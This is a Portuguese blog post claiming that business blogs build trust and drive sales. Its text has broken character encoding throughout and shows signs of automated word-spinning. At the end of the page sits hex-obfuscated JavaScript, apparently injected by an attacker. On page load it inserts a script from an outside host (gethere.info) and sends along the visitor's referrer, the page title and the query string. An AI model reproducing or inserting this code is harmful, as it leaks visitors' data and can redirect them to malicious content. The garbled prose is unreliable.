Blog

Blogues E Vendas: Uma Parceria De NegA?cio Natural ?

Como trekinsidenepal.com.np o visitante pode supor, uma de principais razA�es pelas quais as companhias consideram os blogs eficientes como ferramentas de negA?cios A� que elas auxiliam a ocasionar ou aumentar as vendas. Embora nA?o haja 1 valor quantitativo com relaA�A?o A� influA?ncia monetA?ria exata dos blogs sobre as vendas, hA? evidA?ncias por algum gA�nero de retorno sobre o investimento. O aumento nas vendas pode ser e geralmente A� especialmente um destes efeitos indiretos dos blogues de A?xito.

Blogs – bom para os negA?cios

Imagine sentar em frente ao seu computador usando milhA�es de pessoas (acionistas, parceiros do negA?cios, concorrentes, funcionA?rios e a mA�dia) conversando a respeito de negA?cios e afins. Doravante imagine se vocA? pode usar todas as informaA�A�es que vocA? aprendeu para estabelecer o produto ou serviA�o que seus clientes querem, por que eles querem, tais como eles querem e quanto eles estA?o dispostos a pagar por isso. Isto A� precisamente o que A� especialmente um blog e demasiado mais. Definitivamente, os blogs sA?o bons para as empresas.

Um blogue ou um blog A� um site interativo de que mantA�m uma crA?nica contA�nua de informaA�A�es. A� um site atualizado regularmente com links para outros artigos ou outros sites. Usualmente, um blogue tende a ter uma A?rea do conteA?do primA?rio com artigos chamados postagens ou entradas listadas em ordem cronolA?gica inversa com as mais recentes no topo. Geralmente, esses artigos sA?o organizados em classes. HA? tambA�m igualmente similarmente identicamente conjuntamente um arquivo de artigos baseado em datas. Um blogroll, uma lista de links para outros sites relacionados A� outra caracterA�stica de 1 blog.

Um blogue pode conter um ou mais feeds. A maioria dos blogs publica feeds (RSS, RDF, Atom). Um feed A� 1 conteA?do legA�vel por mA?quina que A� atualizado periodicamente. Um leitor de feeds exibe a nova postagem e um link para ela. A maior parte dos blogues tambA�m tem um recurso que permite aos visitantes deixar comentA?rios. Com 1 blog, o visitante publica novos conteA?dos e seus leitores podem juntar seus prA?prios comentA?rios usando links para seus prA?prios blogs. Elementar de utilizar ferramentas de blogs estA?o disponA�veis, imensas vezes de graA�a. Uma ferramenta bA?sica de blogging fornece uma interface onde o visitante pode labutar de maneira fA?cil e intuitiva enquanto cuida do restante da logA�stica envolvida em tornar seu blog apresentA?vel e disponA�vel para o pA?blico.

Blogar, criar ou manter 1 blog A� uma das A?reas do rA?pido crescimento da Internet. De convA�nio com o popular motor de busca Technorati, hA? mais por 40 milhA�es de blogues na Internet hoje em dia e mais blogs estA?o aparecendo na taxa de 75. 000 por dia. Isto foi principalmente devido aos inA?meros benefA�cios por blogs para negA?cios.

Um blog tem uma poderosa capacidade de marketing para expandir seus negA?cios, seja ele pequeno ou grande. Doravante vocA? pode vir a ter uma presenA�a dominante na Web, nA?o baseada em tamanho, capital ou recursos, contudo baseada na qualidade do conteA?do, pA?blico-alvo e suplementos alimentares e serviA�os A?teis. Usando blogs saiba como equalizadores, a blogosfera se tornou um campo do jogo verdadeiramente estimulante para todas as empresas.

Um blog A� uma fonte repetida de informaA�A�es valiosas e atualizadas. A criaA�A?o de um blog permite que vocA? demonstre sua experiA?ncia e se estabeleA�a saiba como um lA�der de ideias em seu setor. Um blogue pode ser seu veA�culo para atualizaA�A�es de suplementos alimentares ou serviA�os, notA�cias da empresa e qualquer outra informaA�A?o que vocA? queira transmitir ao seu pA?blico-alvo. Um blog deve reprimir informaA�A�es relevantes, nA?o apenas arremessos do vendas; caso contrA?rio, foi muito menos provA?vel de que os leitores retornem. Como acontece com qualquer parcela de 1 plano de marketing da empresa, 1 blog deve conter informaA�A�es que atraiam seu pA?blico-alvo.

Um blog A� um mA�todo eficiente para se comunicar com clientes e prospects. Ele permite de que vocA? converse abertamente e regularmente com eles, aumentando a credibilidade, criando confianA�a e formando relacionamentos com eles desde o princA�pio. Um blogue com seu estilo de conversaA�A?o A� ideal para desenvolver bons relacionamentos com os clientes. Os leitores sentir-se-A?o desembaraA�ado consigo bastante antes de telefonarem-lhe para criar uma adquire ou aproveitar o seu serviA�o.

Um blogue A� uma A?tima ferramenta para conseguir feedback dos leitores. Seus leitores podem vir a deixar comentA?rios ou fazer perguntas. Um blog A� especialmente uma A?tima maneira por descobrir o que estes leitores estA?o pensando e no processo fornece idA�ias ou tais como melhor atendA?-los, melhorando nesse caso o seu negA?cio. Formar decisA�es de negA?cios com base nos feedbacks dos leitores pode vir a ser um dos movimentos mais inteligentes que o visitante pode criar.

No entanto, para ser eficaz, um blog possui que ser atualizado com freqA?A?ncia. Estes leitores nA?o visitam blogues que nA?o apresentam novos conteA?dos regularmente. Manter os leitores informados com postagens periA?dicas sobre o seu negA?cio cria buzz e publicidade. Existem trabalho envolvido na criaA�A?o de um blog. Leva tempo e compromisso para escrever posts interessantes e informativos. Mas pode ser bem gasto, especialmente se ajudar a gerar vendas.

Blogs e Vendas Em Tandem

As vendas exigem interaA�A?o privada. Um blogue A� um desses lugares onde a comunicaA�A?o atravA�s de conversas prospera e os relacionamentos sA?o fomentados. Quando vocA? dA? aos seus leitores informaA�A�es importantes que eles podem possibilitar usar atravA�s do seu blog de maneira consistente, eles ficarA?o satisfeitos. Em seguida, eles retornarA?o para muito mais conteA?do recente regularmente. Horas extras, vocA? serA? capaz de obter um pA?blico fiel. Os leitores vA?o vA?-lo saiba como um especialista em seu nicho especA�fico. Seus leitores vA?o confiar em vocA? e um relacionamento A� progredido. Seus leitores perceberA?o de que A� menos arriscado adquirir de o visitante ou confinar seu serviA�o. Se o visitante pode blogar eficientemente a cerca de o tema, eles tendem a confiar que seu produto ou serviA�o valerA? a pena.

Ao blogar, o visitante estA? enviando a mensagem de que alguA�m estA? ouvindo, alguA�m que vocA? tA?m a possibilidade de abordar saiba como pode ser visto a partir por comentA?rios respondidos e novas atualizaA�A�es. Isso farA? com que seus leitores se sintam mais seguros e levarA? isso em consideraA�A?o, pois eles tomam uma decisA?o por compra. O blog A� inerentemente uma conversa contA�nua que, a longo prazo, gera confianA�a e lealdade e proporciona familiaridade. Quando eles se tornarem clientes satisfeitos, eles virA?o atA� mesmo vocA? para obter muito mais informaA�A�es e, se receberem a opA�A?o, desejarA?o comprar de vocA?. Isso fortalece o relacionamento entre o visitante e seus clientes e eles tambA�m podem enviar outras vendas para o visitante. O ciclo continua. Para alA�m disso, um blog A� uma forma extremamente eficiente para conseguir um ranking elevado do Search Engine. Em outras palavras, os blogs podem vir a trazer muito mais leitores e mais compradores em potencial.

Blogar foi marketing para as pessoas de uma forma menos intrusiva e ofensiva, mais tais como uma conversa freewheeling em comparaA�A?o com um discurso de vendas irritante. A� realmente uma boa forma de estimular as vendas, ainda de que indiretamente.

var _0xb322=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}